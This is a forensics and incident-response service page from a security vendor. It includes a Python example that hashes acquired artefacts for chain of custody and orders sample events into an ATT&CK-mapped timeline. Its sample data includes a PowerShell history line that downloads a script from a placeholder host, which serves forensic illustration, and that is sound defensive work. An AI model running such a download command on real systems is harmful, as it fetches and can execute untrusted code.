DFIR · forensics within incident response

Digital forensics: reconstruct the attack, within incident response.

After an incident you need factual answers: how they got in, what they touched, what they took out. Fortgale digital forensics is the analytical phase of incident response: evidence, chain reconstruction, IOCs. Not court expert reports, but technical analysis that drives containment and notifications.

Evidence acquisition: endpoint · logs
Attack chain: vector + lateral movement
Mapped indicators: IOC · MITRE

Standards: MITRE ATT&CK, NIST IR, ISO/IEC 27001
Output: evidence · chain of custody, attack timeline, IOCs
What we do · DFIR

Three questions, one reconstruction.

Fortgale forensics lives within incident response: the analysts who contain are the same who reconstruct the attack.

01 · Evidence acquisition

Disk and memory images, collection of logs and artefacts on endpoints and infrastructure, with preservation and chain of custody. Evidence is captured before it degrades.

02 · Chain reconstruction

Initial vector, persistence, lateral movement, escalation. The attack timeline mapped to MITRE ATT&CK, from first compromise to objective.

03 · What was touched or exfiltrated

Distinguishing what was accessed, encrypted or copied out: the basis for notifications and for the insurance claim. Plus the IOCs to block re-entry.
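The three steps above (acquire with chain of custody, reconstruct the chain, establish what was touched) are illustrated below with an added example that is not Fortgale's tooling. It builds a SHA-256 chain-of-custody manifest over a set of acquired artefacts, verifies the evidence set has not changed, and orders constructed events into an ATT&CK-mapped timeline from initial vector to objective. Artefact contents, hostnames, case id, collector name and timestamps are all constructed sample data; the technique IDs are real ATT&CK identifiers.

```python
"""Chain-of-custody manifest and ATT&CK-mapped timeline for acquired artefacts.

Added example (not Fortgale's tooling). Artefact contents, hostnames, timestamps
and event descriptions are constructed sample data.
"""
import hashlib
import json
from datetime import datetime, timezone

# Constructed sample artefacts: in a real acquisition these are the disk/memory
# images and log files read from the collection media.
ARTEFACTS = {
    "ws-042/memory.raw": b"\x00" * 64 + b"lsass.exe" + b"\x00" * 64,
    "ws-042/Security.evtx": b"ElfFile\x00" + b"EventID=4624;User=j.doe\n",
    "ws-042/ConsoleHost_history.txt": b"Invoke-WebRequest http://example.invalid/s.ps1\n",
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_manifest(artefacts: dict, case_id: str, collector: str, acquired_at: str) -> list:
    """One entry per artefact: path, size, SHA-256, who acquired it and when.
    The hash is what later proves the copy analysed is the copy acquired."""
    return [
        {
            "case_id": case_id,
            "path": path,
            "size": len(data),
            "sha256": sha256_hex(data),
            "collector": collector,
            "acquired_at": acquired_at,
        }
        for path, data in sorted(artefacts.items())
    ]


def verify_manifest(manifest: list, artefacts: dict) -> list:
    """Return the paths whose current hash no longer matches the manifest, or
    which are missing; an empty list means the evidence set is intact."""
    mismatched = []
    for entry in manifest:
        data = artefacts.get(entry["path"])
        if data is None or sha256_hex(data) != entry["sha256"]:
            mismatched.append(entry["path"])
    return mismatched


# Constructed events, deliberately out of order as they would arrive from
# different log sources. Technique IDs are real ATT&CK identifiers.
EVENTS = [
    ("2024-05-04T02:40:00Z", "srv-fs01", "rclone sync to cloud storage", "T1567.002"),
    ("2024-05-03T09:14:00Z", "ws-042", "Phishing attachment opened", "T1566.001"),
    ("2024-05-04T03:10:00Z", "srv-fs01", "Mass file encryption started", "T1486"),
    ("2024-05-03T11:02:10Z", "srv-fs01", "SMB admin share logon from ws-042", "T1021.002"),
    ("2024-05-03T09:15:30Z", "ws-042", "PowerShell downloader executed", "T1059.001"),
]


def build_timeline(events: list) -> list:
    """Parse timestamps as UTC and order events chronologically."""
    parsed = []
    for ts, host, what, technique in events:
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        parsed.append({"time": when, "host": host, "event": what, "technique": technique})
    return sorted(parsed, key=lambda e: e["time"])


def chain_summary(timeline: list) -> dict:
    """Initial vector, objective, dwell time in hours, hosts touched and the
    techniques seen in order: the raw material for the reconstruction report."""
    first, last = timeline[0], timeline[-1]
    return {
        "initial_vector": first["technique"],
        "objective": last["technique"],
        "dwell_hours": round((last["time"] - first["time"]).total_seconds() / 3600, 2),
        "hosts": sorted({e["host"] for e in timeline}),
        "techniques": [e["technique"] for e in timeline],
    }


if __name__ == "__main__":
    manifest = build_manifest(ARTEFACTS, "CASE-0001", "analyst-a", "2024-05-04T08:00:00Z")
    print(json.dumps(manifest, indent=2))
    print("mismatched:", verify_manifest(manifest, ARTEFACTS))
    print(json.dumps(chain_summary(build_timeline(EVENTS)), indent=2, default=str))
```

The manifest is written once at acquisition and re-checked before every analysis pass; any path returned by verify_manifest breaks the custody chain for that artefact and has to be explained before its findings are used.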

Honest about the scope

Operational forensics, not courtroom forensics.

Fortgale delivers forensics as part of incident response. The evidence and reconstruction support notifications, insurance and internal decisions. Sworn reports and technical expert opinions in a judicial context are a different profession, which Fortgale does not provide: we say so clearly.

Within incident response

Forensics feeds containment and eradication. See the Incident Response service and the MDR that operates it 24·7·365.

Fuelled by research

The analysis of malware and actors (e.g. CTI, 287 tools and actors profiled) accelerates reconstruction: we already know how they move.

Real case · chain reconstruction

In Operation Storming Tide the Fortgale team reconstructed a multi-stage chain (Mora_001: Matanbuchus 3.0 → Astarion RAT → SystemBC, RClone exfiltration), MITRE-mapped, with IOCs published. Exfiltration and ransomware prevented.

Real case · malware analysis

On Nebula Broker the team analysed the proprietary BrokerLoader malware and attributed the actor: Mandiant (Google) later confirmed it as UNC4990. Forensic analysis of the code, not just the alerts.

FAQ · DFIR

What our forensics is (and is not).

Do you produce sworn forensic reports or court expert opinions?

No. We deliver digital forensics as a phase of incident response (DFIR): attack analysis, evidence, reconstruction. We do not offer sworn reports or technical expert opinions in a judicial context: that is a forensic profession dedicated to the legal setting, distinct from ours.

What does Fortgale forensics include?

Acquisition and preservation of evidence (disk, memory, logs), analysis of artefacts, reconstruction of vector and lateral movement, identification of what was exfiltrated, IOCs mapped to MITRE ATT&CK.

When does forensic analysis come in?

During and after an incident, within incident response. It answers three questions: how they got in, what they touched, what they took out. The answers drive containment, restore and notifications.

Does the evidence serve the authority or insurance?

Yes: it supports the data breach notification, the cyber insurance claim and internal documentation. The legal assessment and formal acts remain with the controller, the DPO or legal counsel.

Difference between DFIR and incident response?

IR is the full process (detection, containment, eradication, restore); forensics is the analytical component that reconstructs the facts. At Fortgale they are the same unit: those who contain are those who reconstruct.

Do you need to understand what happened?

Reconstructing the attack is the first step to closing it.

Talk to the Fortgale IR team: we acquire the evidence, reconstruct the attack chain and identify what was exfiltrated, within an incident response service with a European SOC 24·7·365.

Response time: < 1 business day.